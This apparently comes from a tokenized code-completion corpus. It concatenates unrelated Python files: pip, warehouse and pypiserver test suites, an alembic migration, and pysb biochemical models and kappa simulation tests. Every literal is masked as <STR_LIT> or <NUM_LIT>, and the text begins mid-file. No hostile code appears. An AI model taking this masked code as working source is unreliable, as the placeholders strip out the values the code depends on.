<EOL> "<STR_LIT>" <EOL> ) <EOL> ) <EOL> script . pip ( "<STR_LIT>" , req , expect_stderr = True ) <EOL> result = script . pip ( "<STR_LIT>" , "<STR_LIT>" , req , expect_stderr = True ) <EOL> assert "<STR_LIT>" not in result . stdout , result . stdout <EOL> class TestUpgradeDistributeToSetuptools ( object ) : <EOL> """<STR_LIT>""" <EOL> def prep_ve ( self , script , version , pip_src , distribute = False ) : <EOL> self . script = script <EOL> self . script . pip_install_local ( '<STR_LIT>' % version ) <EOL> args = [ '<STR_LIT>' , self . script . scratch_path / '<STR_LIT>' ] <EOL> if distribute : <EOL> args . insert ( <NUM_LIT:1> , '<STR_LIT>' ) <EOL> if version == "<STR_LIT>" and not distribute : <EOL> del self . script . environ [ "<STR_LIT>" ] <EOL> self . script . run ( * args ) <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> bindir = "<STR_LIT>" <EOL> else : <EOL> bindir = "<STR_LIT>" <EOL> self . ve_bin = self . script . scratch_path / '<STR_LIT>' / bindir <EOL> self . script . run ( self . ve_bin / '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . script . run ( <EOL> self . ve_bin / '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> cwd = pip_src , <EOL> expect_stderr = True , <EOL> ) <EOL> @ pytest . mark . skipif ( <EOL> sys . version_info >= ( <NUM_LIT:3> , <NUM_LIT:5> ) , <EOL> reason = "<STR_LIT>" , <EOL> ) <EOL> def test_from_distribute_6_to_setuptools_7 ( <EOL> self , script , data , virtualenv ) : <EOL> self . prep_ve ( <EOL> script , '<STR_LIT>' , virtualenv . pip_source_dir , distribute = True <EOL> ) <EOL> result = self . script . run ( <EOL> self . ve_bin / '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' % data . find_links , '<STR_LIT>' , '<STR_LIT>' , <EOL> expect_stderr = True if sys . version_info [ : <NUM_LIT:2> ] == ( <NUM_LIT:2> , <NUM_LIT:6> ) else False , <EOL> ) <EOL> assert ( <EOL> "<STR_LIT>" in result . stdout <EOL> ) <EOL> result = self . script . run ( <EOL> self . ve_bin / '<STR_LIT>' , '<STR_LIT:list>' , <EOL> expect_stderr = True if sys . version_info [ : <NUM_LIT:2> ] == ( <NUM_LIT:2> , <NUM_LIT:6> ) else False , <EOL> ) <EOL> assert "<STR_LIT>" in result . stdout <EOL> assert "<STR_LIT>" in result . stdout </s>
<s> import os . path <EOL> import pytest <EOL> from pip . download import PipSession <EOL> from pip . index import HTMLPage <EOL> from pip . index import PackageFinder , Link <EOL> def test_sort_locations_file_expand_dir ( data ) : <EOL> """<STR_LIT>""" <EOL> finder = PackageFinder ( [ data . find_links ] , [ ] , session = PipSession ( ) ) <EOL> files , urls = finder . _sort_locations ( [ data . find_links ] , expand_dir = True ) <EOL> assert files and not urls , ( <EOL> "<STR_LIT>" % <EOL> data . find_links <EOL> ) <EOL> def test_sort_locations_file_not_find_link ( data ) : <EOL> """<STR_LIT>""" <EOL> finder = PackageFinder ( [ ] , [ ] , session = PipSession ( ) ) <EOL> files , urls = finder . _sort_locations ( [ data . index_url ( "<STR_LIT>" ) ] ) <EOL> assert urls and not files , "<STR_LIT>" <EOL> def test_sort_locations_non_existing_path ( ) : <EOL> """<STR_LIT>""" <EOL> finder = PackageFinder ( [ ] , [ ] , session = PipSession ( ) ) <EOL> files , urls = finder . _sort_locations ( <EOL> [ os . path . join ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> assert not urls and not files , "<STR_LIT>" <EOL> class TestLink ( object ) : <EOL> def test_splitext ( self ) : <EOL> assert ( '<STR_LIT>' , '<STR_LIT>' ) == Link ( '<STR_LIT>' ) . splitext ( ) <EOL> @ pytest . mark . parametrize ( <EOL> ( "<STR_LIT:url>" , "<STR_LIT>" ) , <EOL> [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) , <EOL> ] , <EOL> ) <EOL> def test_filename ( self , url , expected ) : <EOL> assert Link ( url ) . filename == expected <EOL> def test_no_ext ( self ) : <EOL> assert '<STR_LIT>' == Link ( '<STR_LIT>' ) . ext <EOL> def test_ext ( self ) : <EOL> assert '<STR_LIT>' == Link ( '<STR_LIT>' ) . ext <EOL> def test_ext_fragment ( self ) : <EOL> assert '<STR_LIT>' == Link ( '<STR_LIT>' ) . ext <EOL> def test_ext_query ( self ) : <EOL> assert '<STR_LIT>' == Link ( '<STR_LIT>' ) . ext <EOL> def test_is_wheel ( self ) : <EOL> assert Link ( '<STR_LIT>' ) . is_wheel <EOL> def test_is_wheel_false ( self ) : <EOL> assert not Link ( '<STR_LIT>' ) . is_wheel <EOL> def test_fragments ( self ) : <EOL> url = '<STR_LIT>' <EOL> assert '<STR_LIT>' == Link ( url ) . egg_fragment <EOL> assert None is Link ( url ) . subdirectory_fragment <EOL> url = '<STR_LIT>' <EOL> assert '<STR_LIT>' == Link ( url ) . egg_fragment <EOL> assert '<STR_LIT>' == Link ( url ) . subdirectory_fragment <EOL> url = '<STR_LIT>' <EOL> assert '<STR_LIT>' == Link ( url ) . egg_fragment <EOL> assert '<STR_LIT>' == Link ( url ) . subdirectory_fragment <EOL> @ pytest . mark . parametrize ( <EOL> ( "<STR_LIT:html>" , "<STR_LIT:url>" , "<STR_LIT>" ) , <EOL> [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) , <EOL> ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) , <EOL> ] , <EOL> ) <EOL> def test_base_url ( html , url , expected ) : <EOL> assert HTMLPage ( html , url ) . base_url == expected <EOL> class MockLogger ( object ) : <EOL> def __init__ ( self ) : <EOL> self . called = False <EOL> def warning ( self , * args , ** kwargs ) : <EOL> self . called = True <EOL> @ pytest . mark . parametrize ( <EOL> ( "<STR_LIT:location>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> [ <EOL> ( "<STR_LIT>" , [ ] , True ) , <EOL> ( "<STR_LIT>" , [ ] , False ) , <EOL> ( "<STR_LIT>" , [ ] , True ) , <EOL> ( "<STR_LIT>" , [ ] , False ) , <EOL> ( "<STR_LIT>" , [ ] , False ) , <EOL> ( "<STR_LIT>" , [ ] , False ) , <EOL> ( "<STR_LIT>" , [ ] , False ) , <EOL> ( "<STR_LIT>" , [ ] , True ) , <EOL> ( "<STR_LIT>" , [ "<STR_LIT>" ] , False ) , <EOL> ( "<STR_LIT>" , [ "<STR_LIT>" ] , False ) , <EOL> ] , <EOL> ) <EOL> def test_secure_origin ( location , trusted , expected ) : <EOL> finder = PackageFinder ( [ ] , [ ] , session = [ ] , trusted_hosts = trusted ) <EOL> logger = MockLogger ( ) <EOL> finder . _validate_secure_origin ( logger , location ) <EOL> assert logger . called == expected </s>
<s> </s>
<s> import babel . dates <EOL> import email . utils <EOL> import pretend <EOL> from warehouse . i18n import filters <EOL> def test_format_date ( monkeypatch ) : <EOL> formatted = pretend . stub ( ) <EOL> format_date = pretend . call_recorder ( lambda * a , ** kw : formatted ) <EOL> monkeypatch . setattr ( babel . dates , "<STR_LIT>" , format_date ) <EOL> request = pretend . stub ( locale = pretend . stub ( ) ) <EOL> ctx = pretend . stub ( get = pretend . call_recorder ( lambda k : request ) ) <EOL> args = [ pretend . stub ( ) , pretend . stub ( ) ] <EOL> kwargs = { "<STR_LIT:foo>" : pretend . stub ( ) } <EOL> assert filters . format_date ( ctx , * args , ** kwargs ) is formatted <EOL> kwargs . update ( { "<STR_LIT>" : request . locale } ) <EOL> assert format_date . calls == [ pretend . call ( * args , ** kwargs ) ] <EOL> def test_format_datetime ( monkeypatch ) : <EOL> formatted = pretend . stub ( ) <EOL> format_datetime = pretend . call_recorder ( lambda * a , ** kw : formatted ) <EOL> monkeypatch . setattr ( babel . dates , "<STR_LIT>" , format_datetime ) <EOL> request = pretend . stub ( locale = pretend . stub ( ) ) <EOL> ctx = pretend . stub ( get = pretend . call_recorder ( lambda k : request ) ) <EOL> args = [ pretend . stub ( ) , pretend . stub ( ) ] <EOL> kwargs = { "<STR_LIT:foo>" : pretend . stub ( ) } <EOL> assert filters . format_datetime ( ctx , * args , ** kwargs ) is formatted <EOL> kwargs . update ( { "<STR_LIT>" : request . locale } ) <EOL> assert format_datetime . calls == [ pretend . call ( * args , ** kwargs ) ] <EOL> def test_format_rfc822_datetime ( monkeypatch ) : <EOL> formatted = pretend . stub ( ) <EOL> formatdate = pretend . call_recorder ( lambda * a , ** kw : formatted ) <EOL> monkeypatch . setattr ( email . utils , "<STR_LIT>" , formatdate ) <EOL> ctx = pretend . stub ( ) <EOL> timestamp = pretend . stub ( ) <EOL> args = [ pretend . stub ( timestamp = lambda : timestamp ) , pretend . stub ( ) ] <EOL> kwargs = { "<STR_LIT:foo>" : pretend . stub ( ) } <EOL> assert filters . format_rfc822_datetime ( ctx , * args , ** kwargs ) is formatted <EOL> assert formatdate . calls == [ pretend . call ( timestamp , usegmt = True ) ] </s>
<s> import pretend <EOL> from pyramid . httpexceptions import HTTPMovedPermanently <EOL> from warehouse import redirects <EOL> def test_redirect_view ( ) : <EOL> target = "<STR_LIT>" <EOL> view = redirects . redirect_view_factory ( target ) <EOL> request = pretend . stub ( method = "<STR_LIT:GET>" , matchdict = { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> resp = view ( request ) <EOL> assert isinstance ( resp , HTTPMovedPermanently ) <EOL> assert resp . headers [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> def test_add_redirect ( monkeypatch ) : <EOL> rview = pretend . stub ( ) <EOL> rview_factory = pretend . call_recorder ( lambda target , redirect : rview ) <EOL> monkeypatch . setattr ( redirects , "<STR_LIT>" , rview_factory ) <EOL> config = pretend . stub ( <EOL> add_route = pretend . call_recorder ( lambda name , route , ** kw : None ) , <EOL> add_view = pretend . call_recorder ( lambda view , route_name : None ) , <EOL> ) <EOL> source = "<STR_LIT>" <EOL> target = "<STR_LIT>" <EOL> redirect = pretend . stub ( ) <EOL> kwargs = { <EOL> '<STR_LIT>' : redirect , <EOL> } <EOL> redirects . add_redirect ( config , source , target , ** kwargs ) <EOL> assert config . add_route . calls == [ <EOL> pretend . call ( <EOL> "<STR_LIT>" + source + str ( kwargs ) , source , ** kwargs <EOL> ) , <EOL> ] <EOL> assert config . add_view . calls == [ <EOL> pretend . call ( <EOL> rview , route_name = "<STR_LIT>" + source + str ( kwargs ) <EOL> ) , <EOL> ] <EOL> assert rview_factory . calls == [ pretend . call ( target , redirect = redirect ) ] <EOL> def test_includeme ( ) : <EOL> config = pretend . stub ( <EOL> add_directive = pretend . call_recorder ( lambda n , fn , action_wrap : None ) , <EOL> ) <EOL> redirects . includeme ( config ) <EOL> assert config . add_directive . calls == [ <EOL> pretend . call ( <EOL> "<STR_LIT>" , <EOL> redirects . add_redirect , <EOL> action_wrap = False , <EOL> ) , <EOL> ] </s>
<s> def pypi_action ( action ) : <EOL> def predicate ( info , request ) : <EOL> return action == request . params . get ( "<STR_LIT>" , None ) <EOL> return predicate <EOL> def add_pypi_action_route ( config , name , action , ** kwargs ) : <EOL> custom_predicates = kwargs . pop ( "<STR_LIT>" , [ ] ) <EOL> custom_predicates += [ pypi_action ( action ) ] <EOL> config . add_route ( <EOL> name , "<STR_LIT>" , <EOL> custom_predicates = custom_predicates , <EOL> ** kwargs <EOL> ) <EOL> def add_pypi_action_redirect ( config , action , target , ** kwargs ) : <EOL> custom_predicates = kwargs . pop ( "<STR_LIT>" , [ ] ) <EOL> custom_predicates += [ pypi_action ( action ) ] <EOL> config . add_redirect ( <EOL> "<STR_LIT>" , target , <EOL> custom_predicates = custom_predicates , <EOL> ** kwargs <EOL> ) <EOL> def includeme ( config ) : <EOL> config . add_directive ( <EOL> "<STR_LIT>" , <EOL> add_pypi_action_route , <EOL> action_wrap = False , <EOL> ) <EOL> config . add_directive ( <EOL> "<STR_LIT>" , <EOL> add_pypi_action_redirect , <EOL> action_wrap = False , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from alembic import op <EOL> revision = "<STR_LIT>" <EOL> down_revision = "<STR_LIT>" <EOL> def upgrade ( ) : <EOL> op . execute ( """<STR_LIT>""" ) <EOL> def downgrade ( ) : <EOL> op . execute ( "<STR_LIT>" ) </s>
<s> import datetime <EOL> def now ( ) : <EOL> return datetime . datetime . utcnow ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import ( absolute_import , division , <EOL> print_function , unicode_literals ) <EOL> import logging <EOL> from os . path import abspath , dirname , join , realpath , relpath <EOL> from sys import path <EOL> import pytest <EOL> logger = logging . getLogger ( __name__ ) <EOL> test_dir = realpath ( dirname ( __file__ ) ) <EOL> src_dir = abspath ( join ( test_dir , '<STR_LIT:..>' ) ) <EOL> path . append ( src_dir ) <EOL> print ( path ) <EOL> import pypiserver <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <EOL> { } , <EOL> { '<STR_LIT:root>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:root>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> ] ) <EOL> def test_paste_app_factory ( conf_options , monkeypatch ) : <EOL> """<STR_LIT>""" <EOL> monkeypatch . setattr ( '<STR_LIT>' , <EOL> lambda ** x : ( x , [ x . keys ( ) ] ) ) <EOL> pypiserver . paste_app_factory ( { } , ** conf_options ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from pysb import * <EOL> from pysb . macros import assemble_pore_sequential , pore_transport , pore_species <EOL> Model ( ) <EOL> Monomer ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:t>' ] ) <EOL> Annotation ( Bax , '<STR_LIT>' ) <EOL> Monomer ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT:t>' ] , { '<STR_LIT>' : [ '<STR_LIT:m>' , '<STR_LIT:c>' ] } ) <EOL> Annotation ( Smac , '<STR_LIT>' ) <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT> ) <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT> ) <EOL> for p in Bax_0 , Smac_0 : <EOL> Annotation ( p , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> Initial ( Bax ( s1 = None , s2 = None , t = None ) , Bax_0 ) <EOL> Initial ( Smac ( loc = '<STR_LIT:m>' , t = None ) , Smac_0 ) <EOL> max_size = <NUM_LIT:6> <EOL> min_transport_size = <NUM_LIT:4> <EOL> assembly_rates = [ [ <NUM_LIT> , <NUM_LIT> ] ] * ( max_size - <NUM_LIT:1> ) <EOL> transport_rates = [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] * ( max_size - min_transport_size + <NUM_LIT:1> ) <EOL> assemble_pore_sequential ( Bax ( t = None ) , '<STR_LIT>' , '<STR_LIT>' , max_size , assembly_rates ) <EOL> pore_transport ( Bax , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:t>' , min_transport_size , max_size , <EOL> Smac ( loc = '<STR_LIT:m>' ) , '<STR_LIT:t>' , Smac ( loc = '<STR_LIT:c>' ) , transport_rates ) <EOL> for size in range ( <NUM_LIT:1> , max_size + <NUM_LIT:1> ) : <EOL> Observable ( '<STR_LIT>' % size , pore_species ( Bax , '<STR_LIT>' , '<STR_LIT>' , size ) ) <EOL> Observable ( '<STR_LIT>' , Smac ( loc = '<STR_LIT:m>' , t = None ) ) <EOL> Observable ( '<STR_LIT>' , Smac ( loc = '<STR_LIT:c>' ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> print ( __doc__ , "<STR_LIT:\n>" , model ) <EOL> print ( """<STR_LIT>""" ) </s>
<s> from pysb import * <EOL> Model ( ) <EOL> Monomer ( '<STR_LIT:A>' ) <EOL> Parameter ( '<STR_LIT:k>' , <NUM_LIT> ) <EOL> Rule ( '<STR_LIT>' , None >> A ( ) , k ) </s>
<s> from pysb . testing import * <EOL> from pysb import * <EOL> from pysb . kappa import * <EOL> from pysb . bng import generate_network <EOL> import subprocess <EOL> from re import split <EOL> import pygraphviz as pgv <EOL> @ with_model <EOL> def test_kappa_simulation_results ( ) : <EOL> Monomer ( '<STR_LIT:A>' , [ '<STR_LIT:b>' ] ) <EOL> Monomer ( '<STR_LIT:B>' , [ '<STR_LIT:b>' ] ) <EOL> Initial ( A ( b = None ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( B ( b = None ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Rule ( '<STR_LIT>' , A ( b = None ) + B ( b = None ) >> A ( b = <NUM_LIT:1> ) % B ( b = <NUM_LIT:1> ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> Rule ( '<STR_LIT>' , A ( b = <NUM_LIT:1> ) % B ( b = <NUM_LIT:1> ) >> A ( b = None ) + B ( b = None ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> Observable ( '<STR_LIT>' , A ( b = <NUM_LIT:1> ) % B ( b = <NUM_LIT:1> ) ) <EOL> npts = <NUM_LIT:200> <EOL> kres = run_simulation ( model , time = <NUM_LIT:100> , points = npts ) <EOL> ok_ ( len ( kres [ '<STR_LIT:time>' ] ) == npts + <NUM_LIT:1> ) <EOL> ok_ ( len ( kres [ '<STR_LIT>' ] ) == npts + <NUM_LIT:1> ) <EOL> ok_ ( kres [ '<STR_LIT:time>' ] [ <NUM_LIT:0> ] == <NUM_LIT:0> ) <EOL> ok_ ( sorted ( kres [ '<STR_LIT:time>' ] ) [ - <NUM_LIT:1> ] == <NUM_LIT:100> ) <EOL> @ with_model <EOL> def test_kappa_expressions ( ) : <EOL> Monomer ( '<STR_LIT:A>' , [ '<STR_LIT>' ] , { '<STR_LIT>' : [ '<STR_LIT:u>' ] } ) <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:0.1> ) <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1000> ) <EOL> Expression ( '<STR_LIT>' , <NUM_LIT> / two ) <EOL> Initial ( A ( site = ( '<STR_LIT:u>' ) ) , num_A ) <EOL> Rule ( '<STR_LIT>' , <EOL> A ( site = '<STR_LIT:u>' ) + A ( site = '<STR_LIT:u>' ) >> A ( site = ( '<STR_LIT:u>' , <NUM_LIT:1> ) ) % A ( site = ( '<STR_LIT:u>' , <NUM_LIT:1> ) ) , kf ) <EOL> Rule ( '<STR_LIT>' , <EOL> A ( site = ( '<STR_LIT:u>' , <NUM_LIT:1> ) ) % A ( site = ( '<STR_LIT:u>' , <NUM_LIT:1> ) ) >> <EOL> A ( site = '<STR_LIT:u>' ) + A ( site = '<STR_LIT:u>' ) , kr ) <EOL> run_simulation ( model , time = <NUM_LIT:0> ) <EOL> Rule ( '<STR_LIT>' , A ( site = ( '<STR_LIT:u>' , ANY ) ) >> None , kr ) <EOL> Observable ( '<STR_LIT>' , A ( site = ( '<STR_LIT:u>' , ANY ) ) ) <EOL> run_simulation ( model , time = <NUM_LIT:0> ) <EOL> @ with_model <EOL> def test_flux_map ( ) : <EOL> """<STR_LIT>""" <EOL> Monomer ( '<STR_LIT:A>' , [ '<STR_LIT:b>' ] ) <EOL> Monomer ( '<STR_LIT:B>' , [ '<STR_LIT:a>' , '<STR_LIT:c>' ] ) <EOL> Monomer ( '<STR_LIT:C>' , [ '<STR_LIT:b>' ] ) <EOL> Parameter ( '<STR_LIT:k>' , <NUM_LIT> ) <EOL> Rule ( '<STR_LIT>' , A ( b = None ) + B ( a = None ) >> A ( b = <NUM_LIT:1> ) % B ( a = <NUM_LIT:1> ) , k ) <EOL> Rule ( '<STR_LIT>' , C ( b = None ) + B ( c = None ) >> C ( b = <NUM_LIT:1> ) % B ( c = <NUM_LIT:1> ) , k ) <EOL> Observable ( '<STR_LIT>' , A ( b = <NUM_LIT:1> ) % B ( a = <NUM_LIT:1> , c = <NUM_LIT:2> ) % C ( b = <NUM_LIT:2> ) ) <EOL> Initial ( A ( b = None ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( B ( a = None , c = None ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( C ( b = None ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> res = run_simulation ( model , time = <NUM_LIT:10> , points = <NUM_LIT:100> , flux_map = True , <EOL> output_dir = '<STR_LIT:.>' , cleanup = True , verbose = False ) <EOL> simdata = res . timecourse <EOL> ok_ ( len ( simdata [ '<STR_LIT:time>' ] ) == <NUM_LIT> ) <EOL> ok_ ( len ( simdata [ '<STR_LIT>' ] ) == <NUM_LIT> ) <EOL> ok_ ( simdata [ '<STR_LIT:time>' ] [ <NUM_LIT:0> ] == <NUM_LIT:0> ) <EOL> ok_ ( sorted ( simdata [ '<STR_LIT:time>' ] ) [ - <NUM_LIT:1> ] == <NUM_LIT:10> ) <EOL> fluxmap = res . flux_map <EOL> ok_ ( isinstance ( fluxmap , pgv . AGraph ) ) <EOL> @ with_model <EOL> def test_kappa_wild ( ) : <EOL> Monomer ( '<STR_LIT:A>' , [ '<STR_LIT>' ] ) <EOL> Monomer ( '<STR_LIT:B>' , [ '<STR_LIT>' ] ) <EOL> Initial ( A ( site = None ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( B ( site = None ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( A ( site = <NUM_LIT:1> ) % B ( site = <NUM_LIT:1> ) , Parameter ( '<STR_LIT>' , <NUM_LIT:1000> ) ) <EOL> Rule ( '<STR_LIT>' , A ( site = pysb . WILD ) >> None , Parameter ( '<STR_LIT:k>' , <NUM_LIT:1> ) ) <EOL> Observable ( '<STR_LIT>' , A ( ) ) <EOL> run_simulation ( model , time = <NUM_LIT:0> ) <EOL> @ raises ( ValueError ) <EOL> @ with_model <EOL> def test_run_static_analysis_valueerror ( ) : <EOL> Monomer ( '<STR_LIT:A>' , [ '<STR_LIT:b>' ] ) <EOL> Monomer ( '<STR_LIT:B>' , [ '<STR_LIT:b>' ] ) <EOL> Rule ( '<STR_LIT>' , A ( b = None ) + B ( b = None ) >> A ( b = <NUM_LIT:1> ) % B ( b = <NUM_LIT:1> ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> Observable ( '<STR_LIT>' , A ( b = <NUM_LIT:1> ) % B ( b = <NUM_LIT:1> ) ) <EOL> res = run_static_analysis ( model , contact_map = False , influence_map = False , <EOL> output_dir = '<STR_LIT:.>' ) <EOL> @ with_model <EOL> def test_run_static_analysis_cmap ( ) : <EOL> """<STR_LIT>""" <EOL> Monomer ( '<STR_LIT:A>' , [ '<STR_LIT:b>' ] ) <EOL> Monomer ( '<STR_LIT:B>' , [ '<STR_LIT:b>' ] ) <EOL> Rule ( '<STR_LIT>' , A ( b = None ) + B ( b = None ) >> A ( b = <NUM_LIT:1> ) % B ( b = <NUM_LIT:1> ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> Observable ( '<STR_LIT>' , A ( b = <NUM_LIT:1> ) % B ( b = <NUM_LIT:1> ) ) <EOL> res = run_static_analysis ( model , contact_map = True , influence_map = False , <EOL> output_dir = '<STR_LIT:.>' ) <EOL> ok_ ( isinstance ( res . contact_map , pgv . AGraph ) ) <EOL> ok_ ( res . influence_map is None ) <EOL> @ with_model <EOL> def test_run_static_analysis_imap ( ) : <EOL> """<STR_LIT>""" <EOL> Monomer ( '<STR_LIT:A>' , [ ] ) <EOL> Monomer ( '<STR_LIT:B>' , [ '<STR_LIT>' ] , { '<STR_LIT>' : [ '<STR_LIT:y>' , '<STR_LIT:n>' ] } ) <EOL> Monomer ( '<STR_LIT:C>' , [ '<STR_LIT>' ] , { '<STR_LIT>' : [ '<STR_LIT:y>' , '<STR_LIT:n>' ] } ) <EOL> Initial ( A ( ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( B ( active = '<STR_LIT:n>' ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( C ( active = '<STR_LIT:n>' ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Rule ( '<STR_LIT>' , <EOL> A ( ) + B ( active = '<STR_LIT:n>' ) >> A ( ) + B ( active = '<STR_LIT:y>' ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> Rule ( '<STR_LIT>' , <EOL> B ( active = '<STR_LIT:y>' ) + C ( active = '<STR_LIT:n>' ) >> B ( active = '<STR_LIT:y>' ) + C ( active = '<STR_LIT:y>' ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> res = run_static_analysis ( model , contact_map = False , influence_map = True , <EOL> output_dir = '<STR_LIT:.>' ) <EOL> ok_ ( isinstance ( res . influence_map , pgv . AGraph ) ) <EOL> ok_ ( res . contact_map is None ) <EOL> @ with_model <EOL> def test_run_static_analysis_both ( ) : <EOL> """<STR_LIT>""" <EOL> Monomer ( '<STR_LIT:A>' , [ ] ) <EOL> Monomer ( '<STR_LIT:B>' , [ '<STR_LIT>' ] , { '<STR_LIT>' : [ '<STR_LIT:y>' , '<STR_LIT:n>' ] } ) <EOL> Monomer ( '<STR_LIT:C>' , [ '<STR_LIT>' ] , { '<STR_LIT>' : [ '<STR_LIT:y>' , '<STR_LIT:n>' ] } ) <EOL> Initial ( A ( ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( B ( active = '<STR_LIT:n>' ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( C ( active = '<STR_LIT:n>' ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Rule ( '<STR_LIT>' , <EOL> A ( ) + B ( active = '<STR_LIT:n>' ) >> A ( ) + B ( active = '<STR_LIT:y>' ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> Rule ( '<STR_LIT>' , <EOL> B ( active = '<STR_LIT:y>' ) + C ( active = '<STR_LIT:n>' ) >> B ( active = '<STR_LIT:y>' ) + C ( active = '<STR_LIT:y>' ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> res = run_static_analysis ( model , contact_map = True , influence_map = True , <EOL> output_dir = '<STR_LIT:.>' ) <EOL> ok_ ( isinstance ( res . influence_map , pgv . AGraph ) ) <EOL> ok_ ( isinstance ( res . contact_map , pgv . AGraph ) ) <EOL> @ with_model <EOL> def test_contact_map ( ) : <EOL> Monomer ( '<STR_LIT:A>' , [ '<STR_LIT:b>' ] ) <EOL> Monomer ( '<STR_LIT:B>' , [ '<STR_LIT:b>' ] ) <EOL> Rule ( '<STR_LIT>' , A ( b = None ) + B ( b = None ) >> A ( b = <NUM_LIT:1> ) % B ( b = <NUM_LIT:1> ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> Observable ( '<STR_LIT>' , A ( b = <NUM_LIT:1> ) % B ( b = <NUM_LIT:1> ) ) <EOL> res = contact_map ( model , cleanup = True , output_dir = '<STR_LIT:.>' ) <EOL> ok_ ( isinstance ( res , pgv . AGraph ) ) <EOL> @ with_model <EOL> def test_influence_map_kasa ( ) : <EOL> Monomer ( '<STR_LIT:A>' , [ ] ) <EOL> Monomer ( '<STR_LIT:B>' , [ '<STR_LIT>' ] , { '<STR_LIT>' : [ '<STR_LIT:y>' , '<STR_LIT:n>' ] } ) <EOL> Monomer ( '<STR_LIT:C>' , [ '<STR_LIT>' ] , { '<STR_LIT>' : [ '<STR_LIT:y>' , '<STR_LIT:n>' ] } ) <EOL> Initial ( A ( ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( B ( active = '<STR_LIT:n>' ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Initial ( C ( active = '<STR_LIT:n>' ) , Parameter ( '<STR_LIT>' , <NUM_LIT:100> ) ) <EOL> Rule ( '<STR_LIT>' , <EOL> A ( ) + B ( active = '<STR_LIT:n>' ) >> A ( ) + B ( active = '<STR_LIT:y>' ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> Rule ( '<STR_LIT>' , <EOL> B ( active = '<STR_LIT:y>' ) + C ( active = '<STR_LIT:n>' ) >> B ( active = '<STR_LIT:y>' ) + C ( active = '<STR_LIT:y>' ) , <EOL> Parameter ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> res = influence_map ( model , cleanup = True ) <EOL> ok_ ( isinstance ( res , pgv . AGraph ) ) </s>
